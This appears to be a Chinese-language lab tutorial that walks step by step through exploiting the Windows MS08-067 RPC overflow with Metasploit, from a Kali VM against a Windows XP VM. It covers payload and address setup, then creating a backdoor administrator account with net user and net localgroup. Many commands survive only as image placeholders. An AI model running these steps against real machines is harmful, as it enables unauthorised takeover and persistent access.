1. 程式人生 > >微軟ms08-067滲透實踐

微軟ms08-067滲透實踐

簡單描述:MS08-067漏洞的全稱為“Windows Server服務RPC請求緩衝區溢位漏洞”,如果使用者在受影響的系統上收到特製的 RPC 請求,則該漏洞可能允許遠端執行程式碼。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證即可利用此漏洞執行任意程式碼,此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。

環境:一臺kali虛擬機器,地址為:192.168.123.128
windows xp虛擬機器,地址為:192.168.123.100
1:保證攻擊機和被攻擊機在同一個網段(區域網)
這裡寫圖片描述


2,:開啟postgresql資料庫:service postgresql start 或者 /etc/init.d/postgresql start這裡寫圖片描述
3,:切換到postgres資料庫:su postgres,
3.1:建立使用者:createuser username -P,輸入自己設的密 碼,username為使用者名稱,自己隨便起這裡寫圖片描述
3.2:建立資料庫及其屬組:createdb –owner=username database 第一個 username為剛剛建立的使用者名稱,後面的database為建立的資料庫名稱,意為建立資料庫database,其屬組(主人)為username這裡寫圖片描述

4:進入MSF終端,輸入:msfconsole這裡寫圖片描述
如今進不去的話,敲以下命令,然後多試試msfconsole這裡寫圖片描述
4:進入後檢視資料庫連線情況,輸入:db_status,檢視資料庫狀態下圖表示未連線資料庫 這裡寫圖片描述
如果顯示已連線但不是自己設定的資料庫, 這裡寫圖片描述
那麼斷開這個資料庫連線,命令為:db_disconnect,然後再從新連線
這裡寫圖片描述
5,搜尋漏洞模組的名稱和資訊:search+漏洞名這裡寫圖片描述
6,使用該漏洞模組:use+模組名:這裡寫圖片描述
列出該漏洞模組下可以使用的中的載荷這裡寫圖片描述
4:設定一個windows的shell負荷,或者設定其他的負荷,在剛剛搜尋漏洞的有效模組裡面就可以看到其他的負荷,命令為:set + payloads +負荷名
這裡寫圖片描述

5:設定目標的地址:這裡寫圖片描述
設定自己的地址:
這裡寫圖片描述

6:顯示靶機:show targets,
show targets
列出滲透攻擊所有支援的目標平臺。

可以選擇一個目標,也可以不選,預設為所有的靶機都進行一次掃描:set target 1
這裡寫圖片描述

7,選第一個目標平臺進行攻擊:這裡寫圖片描述

8:攻擊目標輸入:exploit這裡寫圖片描述
9:在windows的dos介面裡面輸入命令:
增加一個使用者:net user +使用者名稱+密碼/add

net localgroup administrators username /add 將username賬戶,給予管理員許可權
這裡寫圖片描述
10:(1),net user abcd 1234 /add,新建一個使用者名稱為abcd,密碼為1234的帳戶,預設為user組成員。
(2),net user abcd /del,將使用者名稱為abcd的使用者刪除。
(3),net user abcd /active:no,將使用者名稱為abcd的使用者禁用。
(4),net user abcd /active:yes,啟用使用者名稱為abcd的使用者。
(5),net user abcd,檢視使用者名稱為abcd的使用者的情況